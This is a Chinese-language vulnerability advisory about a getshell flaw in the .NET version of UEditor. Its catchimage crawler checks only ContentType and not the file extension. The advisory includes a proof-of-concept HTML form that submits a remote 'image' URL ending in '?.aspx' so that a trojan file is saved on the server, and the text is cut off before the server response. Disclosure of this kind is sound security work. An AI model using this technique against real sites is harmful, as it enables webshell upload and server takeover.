UEditor .net版本 getshell

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

## 漏洞简介 1. 发布时间:2018-08-03 2. 公开时间:2018-08-21 3. 漏洞类型:逻辑漏洞 4. 危害等级:高 5. 漏洞编号:xianzhi-2018-08-16052905(不收取 驳回) 6. 测试版本:github最新版 ## 漏洞详情 <https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs> Crawler方法对source[]的检查仅仅是一个ContentType ``` if (response.ContentType.IndexOf("image") == -1) { State = "Url is not an image"; return this; } ``` 并没有检查文件扩展名就直接保存到本地 导致getshell POC: ``` <form action="http://xx.com/editor/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST"> <p>shell addr: <input type="text" name="source[]" /></p> <input type="submit" value="Submit" /> </form> ``` shell addr 可以用<http://www.xxx.com/xxx.jpg?.aspx>的方式使用包含木马的图片(为了使服务器返回的ContentType是image/xxx) 也可以用<http://www.xxxx.com/xxx.php?.aspx>然后在xxx.php中自己设置ContentType 返回如下 >...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息